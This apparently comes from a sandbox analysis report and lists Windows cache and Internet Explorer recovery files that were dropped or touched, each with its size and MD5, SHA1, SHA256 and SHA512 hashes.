SHA51281e4452b150eff6084b9e9d157f1946b70d1c768df658adec79d5eecb1ef82d8e8dcaac342f358d737980eec38e6d74580fdd588dc1b801d4d6160f1323992a4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD560c7666393c4180f6f000e8854c89e8f
SHA19c97c7c126f3fbfd3eaeb15472fa517d03b81976
SHA256af6ab26e5c9fc2cbc578e966a3575c96503e08fb0bd0bddd718725b9b12cd15d
SHA5123f108ec291022822c36c938b66edd9c9f4b73b00dd9b541d85fb5e4da54801296d4c0e80ef52534bd13aa5bbbb3b8534c029eff7ec31b1382122a5e0d0a01045
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD585c00a3a90d172a1e4b1994558e4191c
SHA1e88b741f1d18f92b81cf86f9e9cabe8d1ec1b4cb
SHA2564055317d05e3daa7786c898ae45b48f7216647315ab3b035cfe8c1d6ca716b03
SHA5127db907b8e58839ad1a6bd410636dce29ad9592158932039059fb4a03f38b77a708c343b39c4fba24dd76cf862576498b9a99e5919bd681e810e5fcf03027eab9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD556c66a0d06a3305cc26d68e054bc0020
SHA19643a76a210c36e27dc5d377fd33c61b494e9184
SHA256e163e51d9c60ef206c3028808f714655a881d15a20d61fe9cfca3e8bce85a23c
SHA5120a49dacc9e965f3396148e014b109d3556298dbb88e12d5c521b279a84f083499b92be4c24b8f4b2b5e7314eb0df3f35514f6cc9611af79e78258e40fae31794
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5b21d1466b3e2d975b2101d57ac7fd01f
SHA1bebbc2c02a3314e3b47a52e3fdcc65ede99fccd4
SHA256b3cbb971aec9e9ef0391a3e0bd41950604693b12280405f19b3144407e5433b3
SHA512fcb8b15664962d80a5ee783f3b6b4e2de59491539047f9e5e7c328651b60c397252d7d63ce47c35e76a0a60698a56c75397269940b51a15c8e0161a1ffa7dc1d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5c6017da86e156c5d35f00942cdb9cc8e
SHA1e6ebdef2d9d322d9460aeb3c5cdcafa9b004e6cf
SHA2569720891f98f7e5ad090bfb4466827a08823dfb4bd0eb3fc1b29782f0424e1065
SHA51204629d365bd69f4efe9582c74b80ccd70738f2601fb3aa816b5b3f9187975028c7252b7837bdb773cbe2b929532c222dee40e4895e33db366f1d2a170fa71bba
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5318360d2a79f5c575080a9bf2cb6b730
SHA1ee8207543a9f32f69304d8b580f9a06d7388cb09
SHA256c4796307ee0a1a7bd5e8c34de4eaf18e55f1833970f61b4e94ef28a388ca6d7a
SHA5126511efbe160e7e0fe16ad352207851d2971564847073a96d2d48e5d3707f9977b7560a332027883e48a47c2b46488133fcbabc2906b402b8600aeb118d8f30ec
-
Filesize
5KB
MD510f5ae23f474f1e7f31a8ac6eda9f5c5
SHA1730a164d9ab9ab3ace5ff6618c473d75e8e7773d
SHA256d011581106c4207e11b1b024d94db6f083e239932fe393f3d9f5fbbd8ebb5818
SHA512180ebc7ca45070f1aa0954cf24b20f6040e39a9bcd07544f5a1628584f7cc0c473a0eb8cdc9b6e4d835082289f2569f05806c8ca3993d55228d1f00b8daa0d2d
-
Filesize
5KB
MD51d39eba167183d0b1161f2450c414384
SHA1540776821ffea0471325c8c62ea9d31a9cf33d95
SHA256c4e9d9fbe77269f960b4253323491de236c03915aad767f53c355474fe5ead1e
SHA51243d35d21fa1c0a288f75dc800fbc938c7ec7c70f84d174082899af754752026c900235897f0c703f8f5dfb228c9d6f23973aa392b2914ab9835f5c380f66f7c5
-
Filesize
4KB
MD53d04ab26c57448ce1e70df4b169cdc78
SHA138c9d4531db306d192716bf98be608814b2a4b41
SHA2564cbcaa690f44072d9fa1573fa563952d50278509b0e9d00891dc2b5343b835d0
SHA512d67c17b261cf048988d28e02850ca29cce1669e181369282074e8554e3048701ae1f0dacae2d6a6041b12a3fadaa674ba36db61a30c4b22b7b25827ef242ae24
-
Filesize
3KB
MD5ccd66d21eed634954349f43e8bdf8b3f
SHA18c24aa1e1c233f56a0ef80cfea52094643f618d8
SHA2560454ab2f707d350075933c270c4048401e61b13b4cf79b23be39a4a46e2fc94e
SHA512bd6d57ca79ac2d434060d164bd8a289eb15a3517f7724e621c5c33f1dbfc7267169a961de30d6cbd985fb1bd4c7e29a9d0e01f2c4f8ef110955d9b7ca91f9523
-
Filesize
34KB
MD5ce07affa04803b8889da4add31fd43dc
SHA10fb5a8fcee96a30571493eab29d0e2a6555a16ff
SHA2568c1495c44aec0fa67b5ea6caf921a72de269aff5387ae21fc97e22f94f4f7f3f
SHA512f79974074d4f5f991d2acb486189d8c8668dc854c40dc586836359fc20d38c66d0f98303962c072e119a4ca0daf1156cb8ff476c9b3cebf785f37ae73b88567f
-
Filesize
1KB
MD59dd0519a912b7cbc55ab682a3386012f
SHA1806262b5dda69d80f6b0be1b8258afb6e5b67f42
SHA256c8b23127d7d6cb8ff6231223f1416b472b8ad451eb75683eb59390126f09ef44
SHA512acab8a8828d793d478e1dd7d7e37943d40e1ca974457aeffdda05b8e60c0e8291b1a7f221524a3c10e68e47f01c5ad5d10fb625aadb574457ce874db441b3069
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8FA35E21-9E2D-11EF-A4F8-F6F033B50202}.dat
Filesize5KB
MD5150372768c9784bb6adf229d6cc97312
SHA1524b44ef15daa44928bca816792a38c9e36256ec
SHA2565b17ec268828edc206f8375a2a85b24746a5c3cf995ab93eb6b13fa56c781f8d
SHA512e447ef06006072d1f56917656b80e7926628bc0ad55655f721522179e9419400c6613fc8bce976964eb1000d352ebb4fc752e78d31311d13b48a7df8b8363604
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8FA820E1-9E2D-11EF-A4F8-F6F033B50202}.dat
Filesize3KB
MD57a43d50ebfc56a5dee489e1f827c2811
SHA1db1bcbbe39bc2e3ca00eda82a8710c4e83fb7d9b
SHA2565bbb033eb0246e1c0dbeebf124fe99c86f95c8410cfcfa4724b730c473a599ad
SHA51294ada9c0795797eff1b50ac207b4dce240e5ba017c59fe7a11870b59829fbb096d92ebd6755591519c8328c832b2899170a2daa5459c094c9f29f3cd0e9837dd
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
16KB
MD58443eb75f6aef36fed415f36b8063396
SHA1441ea5897c6cd9d1a0b1cab9fde7d36bdf04149b
SHA2562100aec76420a37f0f629ce4360fbc554c32071ff5750c2300f39bdc4de1c280
SHA5121b8d42ff3edfdcf9491329900894c5916b2f277cef64f0825efffd7c14fbe3c7e6d1f9aca02c447cb6d5f725831d5530c5b5ea02ae2729f038f7b6f89c90c5c1
-
Filesize
16KB
MD5edd562ac2279114db352b65c28161e14
SHA1e63c6d341fbdd86f4845dcae1eb73d0ad260a7fd
SHA256b6d7e6fcf1dd199889b5bac7bc8076b58e7b24ee1c54c96a5088f64db559dcb3
SHA512b291aa327da885f2fbf44441affc6742302e34d8d332924aaab016d5faaf09be7247a319750a4cf6b9af4b25b4cd9b21ece3c100d1f43ac1d89af4d28067e1e3
-
Filesize
16KB
MD53e49f5d4a40a875940cd3aa800abbefd
SHA1c760e2687675d99e782e53a136de4ecf0a87d48e
SHA256b801684ba3cac010615531b6a62a62eb17702f3d859b3b84dd4070a489506a1c
SHA5125d621dc5845bfd6ad481d5d99d855c406da86206ca6f8e7eab80afe59e1b0c155b254ab62e69933ad3413b7d25f688968429ecfa02e342a417cf62fd382d7008
-
Filesize
16KB
MD5fe943cab2f20d88487fea2c3541e810b
SHA1a9301054a06212d03acf642202070270a810551d
SHA256da4be56fa93e3c9e027d944267107dc16735541c04b931608a0b6677fdc2ae0c
SHA512bc6803dce70956e3d4dda37ff14e6f9a04bd25a0d2d68f4f38492d7ade2562b19176df00b525528ca44d37a6c759f882ea249964c69749417e276cefcb77f1a4
-
Filesize
112B
MD5c5cd65032270e1eb91f619f16ae39d87
SHA11224eb18cf2a50b17d5159932b262ec92220bea0
SHA256d4979b41b6f3eccd8d6b8467be1c33b97a195c229b68d8ce2931e30778477112
SHA5120880ee55c333c89a8999ffc275100be6dbcb4949c56fb28a99c6ed0befe31b1a244d285cd0f8f4a912dc7c1e8b406b60d58a072e67b907b175f5a3bb11d92672